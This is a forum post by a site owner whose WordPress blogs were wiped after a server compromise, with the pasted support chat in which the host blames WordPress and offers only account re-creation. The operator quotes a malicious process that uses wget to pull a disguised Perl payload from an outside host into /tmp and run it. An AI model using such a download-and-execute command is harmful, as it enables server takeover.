Hi everyone,
today I was the victim of an exploit and ALL the sites hosted on that server were deleted.
Technical support, after suspending my account for overload, replied that all they can do is re-create my account.
I know practically nothing about computer security; I'm posting the log between me and the technical support operator, who in the end basically says that the problem is WordPress because it is very vulnerable.
I'd like to understand how I can proceed or what I can ask them in order to trace the attack, to understand where it started, where and what it hit, to avoid the same situation in the future, and also to find out whether the vulnerability is really in one of my WordPress sites or in their security settings.
And above all to understand whether I should change hosting!!!
Don't mind my English, translated with Google.
Thanks in advance to anyone who helps me make sense of this.
The sites were all blogs running WordPress updated to the latest version.
If you need more info, just ask.
Hi,
my account was suspended.
Can you help me?
I was the victim of an attack by a hacker?
Hello
I am seeing a suspicious process running under your account as
**sh -c wget formula-1.updatesport.com/xml/dor.jpg -O /tmp/dor.jpg;perl /tmp/dor.jpg**. Can I know what that is?
Hello,
I don't know, I'm sure I never uploaded these two files.
Has someone other than me had access to my account?
Thanks
Hello
The account seems to have been compromised, and using that they are trying to compromise more accounts, so we won't be able to enable the account without re-creating it. Let us know whether we can proceed with account re-creation.
All of my data is lost?
I'm hacked?
Hello
It seems your account was compromised by exploiting some coding vulnerability associated with your pages. It needs to be re-created. Let us know if we can proceed with that.
I'm not a security expert and I did not understand what happened to all
the sites hosted on your servers.
There was a hacker attack?
Can i have the logs about what happened?
Has anyone had any possible access to my cPanel?
Have I lost all data from all sites?
Do you not have a backup of my data?
Please let me know, we're talking about months of work and confidential
personal information.
Thanks
Hello
If the one which I mentioned above is nothing you know about, then your account is compromised. The only thing we can do now is enable it after re-creation.
I realized that I was the victim of an exploit.
I would like more information about taking legal action if possible.
You cannot lose a network of websites hosted on your server and reply
with two lines
saying that you can just recreate the account.
I have not received an answer to the question, "Who had access to my
cPanel?"
I have not received an answer to the question, "Do you or do you not
have a backup of my home directory?"
My sites were based on simple WordPress blogs; I need to get more
information to understand how to prevent similar attacks in the future.
Was the attack directed at my site or at another domain, which then also
caused damage to mine?
Thanks
Hello
WordPress is a very vulnerable script which gets easily hacked; it's not an issue with the server, it's the weakness of those scripts. Adding more plugins and themes makes it even worse. If you search, you will see a lot of compromised cases and even scripts of WordPress hacks. So using WordPress is always high risk. Even if you go for it, we strongly recommend that you consult developers and fix all the coding bugs and loopholes.
Since the account is hacked, the recommended solution is an account re-creation, and again, if you are planning to use WordPress, it's a real risk, as the script has so many known vulnerabilities, which makes it a heaven for hackers. At least check with good developers and fix the coding bugs in it.
Since it seems to be some kind of a URL injection or something, there are logs on the server. We cannot restore the backup, as that may lead to a further hack, as the vulnerabilities will still be there. If you want your data, then get back to us with FTP details for any server other than our own and we will upload the backup for you.
Thanks
Mabin